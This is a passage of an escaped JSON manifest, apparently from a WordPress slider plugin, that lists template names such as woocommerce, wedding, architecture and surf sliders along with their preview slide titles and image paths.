2\",\"img\":\"Masonry-Gallery-Carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Masonry-Gallery-Carousel\\/slide3.jpg\"}],\"neon-wordpress-slider\":[{\"title\":\"Slide 1\",\"img\":\"neon-wordpress-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"neon-wordpress-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"neon-wordpress-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"neon-wordpress-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"neon-wordpress-slider\\/slide5.jpg\"}],\"Restaurant-One-Page-Website\":[{\"title\":\"Slide 1\",\"img\":\"Restaurant-One-Page-Website\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Restaurant-One-Page-Website\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Restaurant-One-Page-Website\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Restaurant-One-Page-Website\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"Restaurant-One-Page-Website\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"Restaurant-One-Page-Website\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"Restaurant-One-Page-Website\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"Restaurant-One-Page-Website\\/slide8.jpg\"},{\"title\":\"Slide 9\",\"img\":\"Restaurant-One-Page-Website\\/slide9.jpg\"},{\"title\":\"Slide 10\",\"img\":\"Restaurant-One-Page-Website\\/slide10.jpg\"},{\"title\":\"Slide 11\",\"img\":\"Restaurant-One-Page-Website\\/slide11.jpg\"}],\"woocommerce-slider\":[{\"title\":\"Slide 1\",\"img\":\"woocommerce-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"woocommerce-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"woocommerce-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"woocommerce-slider\\/slide4.jpg\"}],\"woocommerce-slider-static\":[{\"title\":\"Slide 1\",\"img\":\"woocommerce-slider-static\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"woocommerce-slider-static\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"woocommerce-slider-static\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"woocommerce-slider-static\\/slide4.jpg\"}],\"wordpress-post-slider\":[{\"title\":\"Slide 1\",\"img\":\"wordpress-post-slider\\/slide1.jpg\"}],\"WordPress-Post-Slider-Static\":[{\"title\":\"Slide 1\",\"img\":\"WordPress-Post-Slider-Static\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"WordPress-Post-Slider-Static\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"WordPress-Post-Slider-Static\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"WordPress-Post-Slider-Static\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"WordPress-Post-Slider-Static\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"WordPress-Post-Slider-Static\\/slide6.jpg\"}],\"wordpress-video-slider\":[{\"title\":\"Slide 1\",\"img\":\"wordpress-video-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"wordpress-video-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"wordpress-video-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"wordpress-video-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"wordpress-video-slider\\/slide5.jpg\"}],\"architecture-website-template-package\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/architecture-website-thumb.jpg\"}],\"architecture-menu\":[{\"title\":\"Slide 1\",\"img\":\"architecture-menu\\/slide1.jpg\"}],\"architecture-header-slider\":[{\"title\":\"Slide 1\",\"img\":\"architecture-header-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"architecture-header-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"architecture-header-slider\\/slide3.jpg\"}],\"architecture-text-block\":[{\"title\":\"Slide 1\",\"img\":\"architecture-text-block\\/slide1.jpg\"}],\"architecture-about\":[{\"title\":\"Slide 1\",\"img\":\"architecture-about\\/slide1.jpg\"}],\"architecture-process-title\":[{\"title\":\"Slide 1\",\"img\":\"architecture-process-title\\/slide1.jpg\"}],\"architecture-process\":[{\"title\":\"Slide 1\",\"img\":\"architecture-process\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"architecture-process\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"architecture-process\\/slide3.jpg\"}],\"architecture-portfolio\":[{\"title\":\"Slide 1\",\"img\":\"architecture-portfolio\\/slide1.jpg\"}],\"architecture-portfolio-modal\":[{\"title\":\"Slide 1\",\"img\":\"architecture-portfolio-modal\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"architecture-portfolio-modal\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"architecture-portfolio-modal\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"architecture-portfolio-modal\\/slide4.jpg\"}],\"architecture-contact\":[{\"title\":\"Slide 1\",\"img\":\"architecture-contact\\/slide1.jpg\"}],\"image-comparison-slider\":[{\"title\":\"Slide 1\",\"img\":\"image-comparison-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"image-comparison-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"image-comparison-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"image-comparison-slider\\/slide4.jpg\"}],\"wedding-photo-slider-template-package\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/Wedding-Photo-Slider-Package.jpg\"}],\"wedding-photo-slider\":[{\"title\":\"Slide 1\",\"img\":\"wedding-photo-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"wedding-photo-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"wedding-photo-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"wedding-photo-slider\\/slide4.jpg\"}],\"wedding-photo-slider-modal\":[{\"title\":\"Slide 1\",\"img\":\"wedding-photo-slider-modal\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"wedding-photo-slider-modal\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"wedding-photo-slider-modal\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"wedding-photo-slider-modal\\/slide4.jpg\"}],\"destinations-card-slider\":[{\"title\":\"Slide 1\",\"img\":\"destinations-card-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"destinations-card-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"destinations-card-slider\\/slide3.jpg\"}],\"knives-product-slider\":[{\"title\":\"Slide 1\",\"img\":\"knives-product-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"knives-product-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"knives-product-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"knives-product-slider\\/slide4.jpg\"}],\"tiny-slider-dark\":[{\"title\":\"Slide 1\",\"img\":\"tiny-slider-dark\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"tiny-slider-dark\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"tiny-slider-dark\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"tiny-slider-dark\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"tiny-slider-dark\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"tiny-slider-dark\\/slide6.jpg\"}],\"tiny-slider-light\":[{\"title\":\"Slide 1\",\"img\":\"tiny-slider-light\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"tiny-slider-light\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"tiny-slider-light\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"tiny-slider-light\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"tiny-slider-light\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"tiny-slider-light\\/slide6.jpg\"}],\"pet-store-product-slider\":[{\"title\":\"Slide 1\",\"img\":\"pet-store-product-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"pet-store-product-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"pet-store-product-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"pet-store-product-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"pet-store-product-slider\\/slide5.jpg\"}],\"material-ui-slider\":[{\"title\":\"Slide 1\",\"img\":\"material-ui-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"material-ui-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"material-ui-slider\\/slide3.jpg\"}],\"happy-holidays-hero\":[{\"title\":\"Slide 1\",\"img\":\"happy-holidays-hero\\/slide1.jpg\"}],\"space-and-sci-fi-presentation-slider\":[{\"title\":\"Slide 1\",\"img\":\"space-and-sci-fi-presentation-slider\\/slide1.png\"},{\"title\":\"Slide 2\",\"img\":\"space-and-sci-fi-presentation-slider\\/slide2.png\"},{\"title\":\"Slide 3\",\"img\":\"space-and-sci-fi-presentation-slider\\/slide3.png\"},{\"title\":\"Slide 4\",\"img\":\"space-and-sci-fi-presentation-slider\\/slide4.png\"}],\"Claymorphism-Carousel\":[{\"title\":\"Slide 1\",\"img\":\"Claymorphism-Carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Claymorphism-Carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Claymorphism-Carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Claymorphism-Carousel\\/slide4.jpg\"}],\"404-page-hero-collection\":[{\"title\":\"Slide 1\",\"img\":\"404-page-hero-collection\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"404-page-hero-collection\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"404-page-hero-collection\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"404-page-hero-collection\\/slide4.jpg\"}],\"furniture-store-isometric-slider\":[{\"title\":\"Slide 1\",\"img\":\"furniture-store-isometric-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"furniture-store-isometric-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"furniture-store-isometric-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"furniture-store-isometric-slider\\/slide4.jpg\"}],\"woodworking-website-template-package\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/Woodworking-Website-Template.jpg\"}],\"wood-art-one-page-hero\":[{\"title\":\"Slide 1\",\"img\":\"wood-art-one-page-hero\\/slide1.jpg\"}],\"wood-art-one-page-about\":[{\"title\":\"Slide 1\",\"img\":\"wood-art-one-page-about\\/slide1.jpg\"}],\"wood-art-one-page-work\":[{\"title\":\"Slide 1\",\"img\":\"wood-art-one-page-work\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"wood-art-one-page-work\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"wood-art-one-page-work\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"wood-art-one-page-work\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"wood-art-one-page-work\\/slide5.jpg\"}],\"wood-art-one-page-testimonials\":[{\"title\":\"Slide 1\",\"img\":\"wood-art-one-page-testimonials\\/slide1.jpg\"}],\"wood-art-one-page-events\":[{\"title\":\"Slide 1\",\"img\":\"wood-art-one-page-events\\/slide1.jpg\"}],\"wood-art-one-page-footer\":[{\"title\":\"Slide 1\",\"img\":\"wood-art-one-page-footer\\/slide1.jpg\"}],\"wood-art-one-page-gallery1\":[{\"title\":\"Slide 1\",\"img\":\"wood-art-one-page-gallery1\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"wood-art-one-page-gallery1\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"wood-art-one-page-gallery1\\/slide3.jpg\"}],\"wood-art-one-page-gallery2\":[{\"title\":\"Slide 1\",\"img\":\"wood-art-one-page-gallery2\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"wood-art-one-page-gallery2\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"wood-art-one-page-gallery2\\/slide3.jpg\"}],\"wood-art-one-page-gallery3\":[{\"title\":\"Slide 1\",\"img\":\"wood-art-one-page-gallery3\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"wood-art-one-page-gallery3\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"wood-art-one-page-gallery3\\/slide3.jpg\"}],\"wood-art-one-page-gallery4\":[{\"title\":\"Slide 1\",\"img\":\"wood-art-one-page-gallery4\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"wood-art-one-page-gallery4\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"wood-art-one-page-gallery4\\/slide3.jpg\"}],\"wood-art-one-page-gallery5\":[{\"title\":\"Slide 1\",\"img\":\"wood-art-one-page-gallery5\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"wood-art-one-page-gallery5\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"wood-art-one-page-gallery5\\/slide3.jpg\"}],\"Hero-Template-With-Cursor-Animation\":[{\"title\":\"Slide 1\",\"img\":\"Hero-Template-With-Cursor-Animation\\/slide1.jpg\"}],\"futuristic-hairstyles-slider\":[{\"title\":\"Slide 1\",\"img\":\"futuristic-hairstyles-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"futuristic-hairstyles-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"futuristic-hairstyles-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"futuristic-hairstyles-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"futuristic-hairstyles-slider\\/slide5.jpg\"}],\"instagram-gallery-carousel-1\":[{\"title\":\"Slide 1\",\"img\":\"instagram-gallery-carousel-1\\/slide1.jpg\"}],\"instagram-gallery-carousel-2\":[{\"title\":\"Slide 1\",\"img\":\"instagram-gallery-carousel-2\\/slide1.jpg\"}],\"instagram-gallery-carousel-3\":[{\"title\":\"Slide 1\",\"img\":\"instagram-gallery-carousel-3\\/slide1.jpg\"}],\"instagram-gallery-carousel-4\":[{\"title\":\"Slide 1\",\"img\":\"instagram-gallery-carousel-4\\/slide1.jpg\"}],\"instagram-gallery-carousel-pack\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/Instagram-Gallery-Carousel.jpg\"}],\"Storytelling-Website-Template\":[{\"title\":\"Slide 1\",\"img\":\"Storytelling-Website-Template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Storytelling-Website-Template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Storytelling-Website-Template\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Storytelling-Website-Template\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"Storytelling-Website-Template\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"Storytelling-Website-Template\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"Storytelling-Website-Template\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"Storytelling-Website-Template\\/slide8.jpg\"},{\"title\":\"Slide 9\",\"img\":\"Storytelling-Website-Template\\/slide9.jpg\"},{\"title\":\"Slide 10\",\"img\":\"Storytelling-Website-Template\\/slide10.jpg\"},{\"title\":\"Slide 11\",\"img\":\"Storytelling-Website-Template\\/slide11.jpg\"},{\"title\":\"Slide 12\",\"img\":\"Storytelling-Website-Template\\/slide12.jpg\"},{\"title\":\"Slide 13\",\"img\":\"Storytelling-Website-Template\\/slide13.jpg\"},{\"title\":\"Slide 14\",\"img\":\"Storytelling-Website-Template\\/slide14.jpg\"},{\"title\":\"Slide 15\",\"img\":\"Storytelling-Website-Template\\/slide15.jpg\"},{\"title\":\"Slide 16\",\"img\":\"Storytelling-Website-Template\\/slide16.jpg\"}],\"generative-ai-wordpress-template\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/Generative-AI-Wordpress-Template.jpg\"}],\"G-AI-Hero\":[{\"title\":\"Slide 1\",\"img\":\"G-AI-Hero\\/slide1.jpg\"}],\"G-AI-Intro\":[{\"title\":\"Slide 1\",\"img\":\"G-AI-Intro\\/slide1.jpg\"}],\"G-AI-Logos\":[{\"title\":\"Slide 1\",\"img\":\"G-AI-Logos\\/slide1.jpg\"}],\"G-AI-Images\":[{\"title\":\"Slide 1\",\"img\":\"G-AI-Images\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"G-AI-Images\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"G-AI-Images\\/slide3.jpg\"}],\"G-AI-Copy\":[{\"title\":\"Slide 1\",\"img\":\"G-AI-Copy\\/slide1.jpg\"}],\"G-AI-Tools\":[{\"title\":\"Slide 1\",\"img\":\"G-AI-Tools\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"G-AI-Tools\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"G-AI-Tools\\/slide3.jpg\"}],\"G-AI-Cases\":[{\"title\":\"Slide 1\",\"img\":\"G-AI-Cases\\/slide1.jpg\"}],\"G-AI-Gallery-Title\":[{\"title\":\"Slide 1\",\"img\":\"G-AI-Gallery-Title\\/slide1.jpg\"}],\"G-AI-Gallery\":[{\"title\":\"Slide 1\",\"img\":\"G-AI-Gallery\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"G-AI-Gallery\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"G-AI-Gallery\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"G-AI-Gallery\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"G-AI-Gallery\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"G-AI-Gallery\\/slide6.jpg\"}],\"G-AI-Testimonials\":[{\"title\":\"Slide 1\",\"img\":\"G-AI-Testimonials\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"G-AI-Testimonials\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"G-AI-Testimonials\\/slide3.jpg\"}],\"G-AI-Footer\":[{\"title\":\"Slide 1\",\"img\":\"G-AI-Footer\\/slide1.jpg\"}],\"visual-design-one-pager\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/Visual-Design-One-Pager.jpg\"}],\"visual-designer-menu\":[{\"title\":\"Slide 1\",\"img\":\"visual-designer-menu\\/slide1.jpg\"}],\"visual-designer-slider\":[{\"title\":\"Slide 1\",\"img\":\"visual-designer-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"visual-designer-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"visual-designer-slider\\/slide3.jpg\"}],\"Visual-Designer-Portfolio\":[{\"title\":\"Slide 1\",\"img\":\"Visual-Designer-Portfolio\\/slide1.jpg\"}],\"Visual-Designer-About\":[{\"title\":\"Slide 1\",\"img\":\"Visual-Designer-About\\/slide1.jpg\"}],\"visual-designer-footer\":[{\"title\":\"Slide 1\",\"img\":\"visual-designer-footer\\/slide1.jpg\"}],\"Visual-Designer-Detail-View\":[{\"title\":\"Slide 1\",\"img\":\"Visual-Designer-Detail-View\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Visual-Designer-Detail-View\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Visual-Designer-Detail-View\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Visual-Designer-Detail-View\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"Visual-Designer-Detail-View\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"Visual-Designer-Detail-View\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"Visual-Designer-Detail-View\\/slide7.jpg\"}],\"online-watch-shop-slider\":[{\"title\":\"Slide 1\",\"img\":\"online-watch-shop-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"online-watch-shop-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"online-watch-shop-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"online-watch-shop-slider\\/slide4.jpg\"}],\"Brewery-Website-Slider-Template\":[{\"title\":\"Slide 1\",\"img\":\"Brewery-Website-Slider-Template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Brewery-Website-Slider-Template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Brewery-Website-Slider-Template\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Brewery-Website-Slider-Template\\/slide4.jpg\"}],\"Hero-Slider-with-Midjourney-Image-Effect\":[{\"title\":\"Slide 1\",\"img\":\"Hero-Slider-with-Midjourney-Image-Effect\\/slide1.jpg\"}],\"Highlight-Hero-Section-Template\":[{\"title\":\"Slide 1\",\"img\":\"Highlight-Hero-Section-Template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Highlight-Hero-Section-Template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Highlight-Hero-Section-Template\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Highlight-Hero-Section-Template\\/slide4.jpg\"}],\"Samurai-Fullscreen-Carousel-Template\":[{\"title\":\"Slide 1\",\"img\":\"Samurai-Fullscreen-Carousel-Template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Samurai-Fullscreen-Carousel-Template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Samurai-Fullscreen-Carousel-Template\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Samurai-Fullscreen-Carousel-Template\\/slide4.jpg\"}],\"surf-scroll-based-story-template\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/surf-scroll-based-story-template.jpg\"}],\"Surf-Template-Logo\":[{\"title\":\"Slide 1\",\"img\":\"Surf-Template-Logo\\/slide1.jpg\"}],\"Surf-Template-1\":[{\"title\":\"Slide 1\",\"img\":\"Surf-Template-1\\/slide1.jpg\"}],\"Surf-Template-2\":[{\"title\":\"Slide 1\",\"img\":\"Surf-Template-2\\/slide1.jpg\"}],\"Surf-Template-3\":[{\"title\":\"Slide 1\",\"img\":\"Surf-Template-3\\/slide1.jpg\"}],\"Surf-Template-4\":[{\"title\":\"Slide 1\",\"img\":\"Surf-Template-4\\/slide1.jpg\"}],\"50-50-Split-Screen-Website-Design\":[{\"title\":\"Slide 1\",\"img\":\"50-50-Split-Screen-Website-Design\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"50-50-Split-Screen-Website-Design\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"50-50-Split-Screen-Website-Design\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"50-50-Split-Screen-Website-Design\\/slide4.jpg\"}],\"Food-Presentation-Template-Slider\":[{\"title\":\"Slide 1\",\"img\":\"Food-Presentation-Template-Slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Food-Presentation-Template-Slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Food-Presentation-Template-Slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Food-Presentation-Template-Slider\\/slide4.jpg\"}],\"FutureSight-Digital-Marketing-Template\":[{\"title\":\"Slide 1\",\"img\":\"FutureSight-Digital-Marketing-Template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"FutureSight-Digital-Marketing-Template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"FutureSight-Digital-Marketing-Template\\/slide3.jpg\"}],\"Starry-Night-Parallax-Zoom-Effect-Slider\":[{\"title\":\"Slide 1\",\"img\":\"Starry-Night-Parallax-Zoom-Effect-Slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Starry-Night-Parallax-Zoom-Effect-Slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Starry-Night-Parallax-Zoom-Effect-Slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Starry-Night-Parallax-Zoom-Effect-Slider\\/slide4.jpg\"}],\"beyond-the-void\":[{\"title\":\"Slide 1\",\"img\":\"beyond-the-void\\/slide1.jpg\"}],\"Static-Ecommerce-Product-Carousel\":[{\"title\":\"Slide 1\",\"img\":\"Static-Ecommerce-Product-Carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Static-Ecommerce-Product-Carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Static-Ecommerce-Product-Carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Static-Ecommerce-Product-Carousel\\/slide4.jpg\"}],\"woo-ecommerce-product-carousel\":[{\"title\":\"Slide 1\",\"img\":\"woo-ecommerce-product-carousel\\/slide1.jpg\"}],\"Serenity-Hero-With-Focus-Effect\":[{\"title\":\"Slide 1\",\"img\":\"Serenity-Hero-With-Focus-Effect\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Serenity-Hero-With-Focus-Effect\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Serenity-Hero-With-Focus-Effect\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Serenity-Hero-With-Focus-Effect\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"Serenity-Hero-With-Focus-Effect\\/slide5.jpg\"}],\"OakGrove-Wine-Slider-Template\":[{\"title\":\"Slide 1\",\"img\":\"OakGrove-Wine-Slider-Template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"OakGrove-Wine-Slider-Template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"OakGrove-Wine-Slider-Template\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"OakGrove-Wine-Slider-Template\\/slide4.jpg\"}],\"Geometric-Slider-Design-Template\":[{\"title\":\"Slide 1\",\"img\":\"Geometric-Slider-Design-Template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Geometric-Slider-Design-Template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Geometric-Slider-Design-Template\\/slide3.jpg\"}],\"Chocolate-Bar-Product-Presentation-Template\":[{\"title\":\"Slide 1\",\"img\":\"Chocolate-Bar-Product-Presentation-Template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Chocolate-Bar-Product-Presentation-Template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Chocolate-Bar-Product-Presentation-Template\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Chocolate-Bar-Product-Presentation-Template\\/slide4.jpg\"}],\"Fluid-Dynamics-Effect-Showcase\":[{\"title\":\"Slide 1\",\"img\":\"Fluid-Dynamics-Effect-Showcase\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Fluid-Dynamics-Effect-Showcase\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Fluid-Dynamics-Effect-Showcase\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Fluid-Dynamics-Effect-Showcase\\/slide4.jpg\"}],\"Spotlight-Hero-Header-With-Fluid-Effect\":[{\"title\":\"Slide 1\",\"img\":\"Spotlight-Hero-Header-With-Fluid-Effect\\/slide1.jpg\"}],\"Suits-Product-Showcase-Slider-Template\":[{\"title\":\"Slide 1\",\"img\":\"Suits-Product-Showcase-Slider-Template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Suits-Product-Showcase-Slider-Template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Suits-Product-Showcase-Slider-Template\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Suits-Product-Showcase-Slider-Template\\/slide4.jpg\"}],\"Beards-Full-Width-Image-Carousel-Template\":[{\"title\":\"Slide 1\",\"img\":\"Beards-Full-Width-Image-Carousel-Template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Beards-Full-Width-Image-Carousel-Template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Beards-Full-Width-Image-Carousel-Template\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Beards-Full-Width-Image-Carousel-Template\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"Beards-Full-Width-Image-Carousel-Template\\/slide5.jpg\"}],\"Animated-Type-Hero-Collection\":[{\"title\":\"Slide 1\",\"img\":\"Animated-Type-Hero-Collection\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Animated-Type-Hero-Collection\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Animated-Type-Hero-Collection\\/slide3.jpg\"}],\"Horoscope-Slider-with-Zodiac-Showcase\":[{\"title\":\"Slide 1\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide2.jpg\"},{\"title\":\"Slide 